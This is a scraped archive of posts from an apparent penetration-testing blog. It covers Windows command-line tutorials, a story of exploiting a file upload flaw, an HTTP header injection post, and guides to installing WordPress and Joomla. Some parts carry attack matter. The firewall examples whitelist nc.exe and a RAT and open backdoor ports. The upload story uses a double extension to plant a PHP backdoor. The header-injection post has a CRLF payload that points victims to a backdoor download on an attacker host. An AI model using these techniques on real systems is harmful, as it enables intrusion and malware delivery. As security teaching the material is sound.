Windows command line tutorial[part4]

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

–>

You are Expert!!!

TASK
See all Pid(process id):
tasklist
tasklist /? (This command will show all option:help)
Show the all DLL is with the image:
tasklist /M >pid.txt (Output to a text file called “pid.txt”)
Show the all DLL is related with the specified image:
Displaying Services in each process:
tasklist /SVC
Example output:
Image Name PID Services
========================= ====== =============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 552 N/A
csrss.exe 608 N/A
winlogon.exe 632 N/A
services.exe 676 Eventlog, PlugPlay
lsass.exe 688 PolicyAgent, ProtectedStorage, SamSs
vmacthlp.exe 844 VMware Physical Disk Helper Service
svchost.exe 860 DcomLaunch, TermService
svchost.exe 936 RpcSs
svchost.exe 1028 AudioSrv, CryptSvc, Dhcp, dmserver, ERSvc,
EventSystem, FastUserSwitchingCompatibility,
helpsvc, lanmanserver, lanmanworkstation,
Netman, Nla, Schedule, seclogon, SENS,
SharedAccess, ShellHWDetection, srservice,
Themes, TrkWks, W32Time, winmgmt, wscsvc,
wuauserv, WZCSVC
svchost.exe 1076 Dnscache
svchost.exe 1128 LmHosts, RemoteRegistry, SSDPSRV, WebClient
explorer.exe 1476 N/A
spoolsv.exe 1516 Spooler
VMwareTray.exe 1616 N/A
vmtoolsd.exe 1632 N/A
IDMan.exe 1640 N/A
Skype.exe 1648 N/A
IEMonitor.exe 1796 N/A
vmtoolsd.exe 988 VMTools
TPAutoConnSvc.exe 796 TPAutoConnSvc
alg.exe 384 ALG
wscntfy.exe 2096 N/A
TPAutoConnect.exe 2412 N/A
cmd.exe 2760 N/A
wuauclt.exe 3212 N/A
notepad.exe 296 N/A
tasklist.exe 272 N/A
wmiprvse.exe 1612 N/A
Service OUTPUT:
tasklist /SVC /FO CSV
TASKILL
Taskkill is a tool to kill a process.
Simple command:
taskkill /?
Example output:
TASKKILL [/S system [/U username [/P [password]]]]
{ [/FI filter] [/PID processid | /IM imagename] } [/F] [/T]
Description:
This command line tool can be used to end one or more processes.
Processes can be killed by the process id or image name.
Parameter List:
/S system Specifies the remote system to connect to.
/U [domain]user Specifies the user context under which
the command should execute.
/P [password] Specifies the password for the given
user context. Prompts for input if omitted.
/F Specifies to forcefully terminate
process(es).
/FI filter Displays a set of tasks that match a
given criteria specified by the filter.
/PID process id Specifies the PID of the process that
has to be terminated.
/IM image name Specifies the image name of the process
that has to be terminated. Wildcard ‘*’
can be used to specify all image names.
/T Tree kill: terminates the specified process
and any child processes which were started by it.
/? Displays this help/usage.
Filters:
Filter Name Valid Operators Valid Value(s)
———– ————— ————–
STATUS eq, ne RUNNING | NOT RESPONDING
IMAGENAME eq, ne Image name
PID eq, ne, gt, lt, ge, le PID value
SESSION eq, ne, gt, lt, ge, le Session number.
CPUTIME eq, ne, gt, lt, ge, le CPU time in the format
of hh:mm:ss.
hh – hours,
mm – minutes, ss – seconds
MEMUSAGE eq, ne, gt, lt, ge, le Memory usage in KB
USERNAME eq, ne User name in [domain]user
format
MODULES eq, ne DLL name
SERVICES eq, ne Service name
WINDOWTITLE eq, ne Window title
NOTE: Wildcard ‘*’ for the /IM switch is accepted only with filters.
NOTE: Termination of remote processes will always be done forcefully
irrespective of whether /F option is specified or not.
Examples:
TASKKILL /S system /F /IM notepad.exe /T
TASKKILL /PID 1230 /PID 1241 /PID 1253 /T
TASKKILL /F /IM notepad.exe /IM mspaint.exe
TASKKILL /F /FI “PID ge 1000” /FI “WINDOWTITLE ne untitle*”
TASKKILL /F /FI “USERNAME eq NT AUTHORITYSYSTEM” /IM notepad.exe
TASKKILL /S system /U domainusername /FI “USERNAME ne NT*” /IM *
TASKKILL /S system /U username /P password /FI “IMAGENAME eq note*”
Kill a process:
taskkill /PID 296
taskill /IM notepad.exe
Killing Multiple process:
taskill /PID 333 /PID 444 /PID 49494
Starting and Stopping Service
Simple command:
sc (help)
Stop a service:
sc stop avp
start a service:
sc start avp
See configuration of a service :
sc qc avp
Example output:
C:Documents and SettingsAdministratorDesktop>sc qc RemoteRegistry
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: RemoteRegistry
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:WINDOWSsystem32svchost.exe -k LocalService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Remote Registry
DEPENDENCIES : RPCSS
SERVICE_START_NAME : NT AUTHORITYLocalService
Configure the service :
sc config start = disable
There are other many more command to be used what we don’t knowt yet. I did not wrote many other command here . You need to practice , Google search, etc. There are more powerful game with “wmic” and other “commands” which I did not explain here. If you want me to write more tutorial , any feedback or for other tutorial please visit http://www.c0nnect3d.blogspot.comand post your question. I will happily help you.
Thanks
Contact:

Windows command line tutorial [part3]

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

 

The Firewall
netsh” is for configuring windows firewall.
We can configure the firewall from command line(cmd.exe) easily. I am including some firewall command below.
Start firewall:
Netsh> help
or
netsh firewall ?
Show all current configuration of the firewall:
netsh firewall show config
Firewall “set” command:
(This will set up the firewall to allow a program.)
netsh firewall set (see helps)
Enable the firewall
netsh firewall set opmode enable
ICMP setting:
netsh firewall set icmpsetting 8
Or
netsh firewall set icmpsetting type=all mode=enable
firewall service:
netsh firewall set service type=REMOTEADMIN mode=enable scope=CUSTOM address= ip.ip.ip.ip
netsh firewall set service REMOTEDESKTOP ENABLE
Adding new rules “The ‘add’ command”:
netsh firewall add ? (For helps)
netsh firewall add allowedprogram c:somewhereyourncnc.exe virus ENABLE
netsh firewall add allowedprogram program= c:somewheresomethingsrat.exe name=legit mode=enable
Open a port:
netsh firewall portopening TCP 1337 backdoor
netsh firewall portopening protocol=TCP port=31337 name=another mode=ENABLE scope=CUSTOM address=ip.ip.ip.ip profile=ALL interface=eth0
Delete a allowed program:
netsh firewall delete allowedprogram c:somewheresomethingvirusnc.exe
netsh firewall delete allowedprogram program=c:here1337deletethehackerbye.exe profile=ALL
Turn into default windows firewall:
netsh firewall reset

Exploiting file upload vulnerability

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I did my job very quickly after found a File Uploading Vulnerability in a website. I was pentesting a network remotely (Blackbox testing) and it was really hard. I often browsed their website. Even I did not able to ping their IP because it was firewall . My only rest thing to be done was Social Engineering and Web pentesting (Really i was confused!!! If the SE and Web hacking method does not work then perhaps my heart about to attacked !!! lol(my heart is not weak)). Anyway, I scanned the site with various vulnerability scanner ,,,, no luck!!! So I started browsing the site manually(and Google searching randomly, Truthfully dunno what to find).

Suddenly I found a personal file upload link which was hell to find the link but my google friend helped me much. The link was like : www.hired-me.org/test/personal/re_al/file2010.php . It just accept 3 types of file extension JPEG, TEXT,CSV. First time i did not think that this link has any vulnerability(Already confused for the fucking scanner!!!).

How i exploited:

First i upload a jpeg file and try to find the location where it is saved. It was also hard(My knowledge is sucks?). OK, At least i found the jpeg file is located in the www.hired-me.com/index/hidden/director/test.jpeg  , Everything Okay. Now i quickly create a php file[test.php] :

<?php
echo “This is test”
?>

I quickly try to upload the “test.php” and “test.jpeg.php” but error “Unknown File Extension” . This error make me sure that the file extension is filtered.

Again i renamed the “test.php” to “test.php.jpeg” . Now no error!!! wow!!
I quickly check www.hired-me.com/index/hidden/director/test.php.jpeg and the page display “This is test“. Now i decide to upload a real php backdoor. Then upload some rooting tools then created ssh and then compromised two additional machine. Job is done!!!  

Feedback are welcome!!!

    

HTTP header injection

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

If we can inject newline into the header we control , then we will be able to insert some additional HTTP Header and some nasty body text. I don’t think so that we can compromised a website/server via this vulnerability. But still it is power for Social Engineering attack, Phishing, Redirecting to malicious site, downloading backdoor, virtual defacement, sometime injecting cookie  etc. It is much like XSS.

Basically this vulnerability found in “set-cookie” and “location”  . If we connect to a website:

nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit HTTP/1.1
After this get request we get like(Try to find it):

set-cookie=PaymentMethod=credit

If this is behavior of the host then we should try to insert Carriage-return and Line-feed :

nc -vv target.com 80  
GET /something.php?id=1&pay=40000&method=credit%0d%0a it-is=vulnerable HTTP/1.1

If the host is vulnerable then it will reply with a additional line “it-is=vulnerable” like this:

set-cookie=PaymentMethod=credi

it-is=vulnerable 

Simply a hacker can force the users to download a backdoor:

http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1

We can also create fake Cookie and send the url to the poor victim . Just think smartly and you will find some other way 😉

Be aware!!!

Windows command line tutorial [part2]

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

–>

Some Advanced Things
whoami:
echo %username%
where I am :
echo %path% (pwd?)
What is the computer name:
echo %computername%
How many file in a directory (The “find”):
dir /b c:somewhere| find /c /v “”
Starting a services :
sc start some-services
Finding specific file in a directory:
dir /b /s c: | find “notepad.exe” or
dir /b /s c:some.txt
The findstr command used for find specific line:
findstr “user” c:usernamepasswordpass.sql
Note: “findstr /? “ for more help.
How many line in file:
findstr /s “something” c:username | find /c /v “”
More Advanced
Users management and Networking:
PLAYING WITH USER:
net 

See all current user name:
net user
Add user:
net user username password /add
Delete the user:
net user username password /delete
See the all current User group:
net localgroup
Add user to administrator group :
net user localgroup Administrators username /add
Delete the user from administrator group :
net user localgroup administrators username /delete
Running command as administrator:
runas /u:administrator c:windowswindows32nc.exe
See the Account policy:
net accounts
set a account policy :
net accounts /MINPWLEN=50 /MAXPWAGE= 30 /MINPWAGE=3
PLAYING WITH NETWORK:
SMB share:
net use \ip.ip.ip.ip passw0rd /u:backdoored?(us3rna3m?)
net use \ip.ip.ip.ipc$ passw00rd /u:administrator
share path:
net share (See what path to share)
File Transfer protocol:
ftp microsoft.com
IPCONFIG (linux ifconfig?):
ipconfig(see the network information and ip address)
ipconfig /all (See the all network information with all interface).

Windows command line tutorial[part1]

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Are you guys penetration tester , system administrator? How much is your windows command line knowledge? Hey don’t start laughing ;). As a expert system administrator you must have some command line knowledge and if you are a Penetration tester then this is your first way …. No?
Anyway, I will try to write most of windows commands which may help you too. But Remember that I will not explain in details Because this may take very long time so you should try practically(VMware installed?). Hope you have some good logic too(If not then how we think like a Genius ?? hehe) . 
Think these are practical example then tutorial which you need to yourself practically.


Hope you know how to open the cmd.exe(Start>>Run>>cmd . And Hit ENTER).

If you type ‘help’ then you will get all possible command to execute . But do you exactly know how to work with these command effectively?
If you want to open another cmd then just “cmd” or “start” command.
Make a directory:
mkdir c:admin
change to the directory:

deleting a file:
del c:webindex.asp
reading from command line :
type c:adminsome.txt
writing a file:
echo “<html>” > test.html
echo “<body>”>>test.html
echo “<p>this is test as a system admin</p>” >>test.html
echo “</bdoy></html>” >>test.html
now try to see the file “type test.html
removing a directory:
rmdir c:admin or rmdir /S c:adminto removing the directory.
Many garbage in your console so clear :
cls
How many directory ?:
See how many directory in the current directory.
dir    

see how many directory into C:windowssystem32.
dir “c:windowssystem32”
Hidden Directory:

 See the all directory in a specified path.
dir /aHD c:windowssystem32 

Copy a file:
copy c:win.inic:adminherewin.txt 

for directroy or file.
xcopy e:somedirectory f:somewherecopy

removing directory:
moving a file permanently and renaming:
error redirecting:
app.exe 2>error.txt
Open the error.txt “type error.txt” or notepad “error.txt”
Multiple command:
move filetomove c:path|| telnet microsoft.com 80
anycommand || dir || more-command
type somefile.txt & cmd.exe or type somefile.txt && cmd.exe
 
paginate long output:
dir c:windowssystem32 | more    (You have to hit enter)
local time:
time || exit (See time , set time and exit the cmd)

Install Joomla and do the practice

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

We have installed wordpress which is really very very easy to install. Now i am going to show you to install JOOMLA . I think you are enough smart to understand that why we need joomla, wordpress or others things . Let’s start,

Download joomla from http://www.joomla.org/download.html

it is a zip file .Extract it same as WordPress i did.

We need to install apache2 php5-mysql libapache2-mod-php5 mysql-server

Some of them we already installed when installed the wordpress

So simply :

apt-get install  libapache2-mod-php5 
 Now We need to configure the mysql server for JOOMLA.

Here is the screenshoot:



Please write the command using your hand instead coping and pasting (hehe). You also see 3 Errors in this screen shot which is juice for a hacker. Whenever you give bad command you will get this error. 
We are ready to go,
Browse http://localhost/joomla/installation/  click “next” :


In the next stage you will see another windows and check if it has all dependency . Make sure:


OK click “Next”

Now it should display the license agreement , Again click “Next”


Now it should display a page for configuring database. So configure it like :


Warning: You should not use the root user for database if you are following this guide for business purpose.
OK now click ‘next’

Now you will get FTP server configuration. But if you wish to not use the ftp service then just click ” next” 



This is the last step:



Now just : rm -r /var/www/joomla/installation.
DONE!

Default Admin page http://localhost/administrator 




Good Luck!!!


Install WordPress(Default) and do the practice

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

You should not run any hacking tools or attempt to hack third party website which may brings some dangerous for you. Also some peoples even does not know how to create their own website for testing purpose or even for serious business. So i will explain that how we can install our own web software such as wordpress, phpbb, mybb, joomla etc. Installing these software is very easy. Let’s start.

(NOTE: You need these things to understand the things )

WordPress:

You need to install MySql, Apache, PHP, php-gd

currently i am using Kubuntu. If you are also running Kubuntu or Ubuntu then run :

apt-get install mysql-server php5 php-gd php5-mysql

Specify your mysql password. Remember Defaultly it will mysql root password (Be aware!!!).

Please download the wordpress from their site(http://wordpress.org/latest.zip) with command wget -c http://wordpress.org/latest.zip.

root@security:~/Desktop/Web software# cp wordpress-3.2.zip /var/www

root@security:~ /var/www# unzip wordpress-3.2.zip
root@security:~ /var/www# cp wordpress
Now we need to edit the “wp-config-sample.php”
First going to backup:
root@security:~ /var/www/wordpress# cp wp-config-sample.php wp-config.php

Now we edit ,

root@security:~ /var/www/wordpress# nano wp-config.php

we just need to edit some simple things:

define(‘DB_NAME’, ‘wordpress‘);

/** MySQL database username */
define(‘DB_USER’, ‘Insert_your_username_here‘);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘and_Password_of_Mysql‘);

Screenshot:

One question that are you sure that you have “wordpress” database name? I don’t think so. So create the database name otherwise installation will be failed:

GOOD !!! now you are ready to go …

Just visit : http://localhost/wordpress/wp-admin/install.php (OR IP) and you will see:

Simply fill up the forum and click on “install” button.

Good !! you just installed the wordpress :

 click on “Log in” button for wordpress administration .

Now enjoy, practice the security in your own site.

Next we will install “Joomla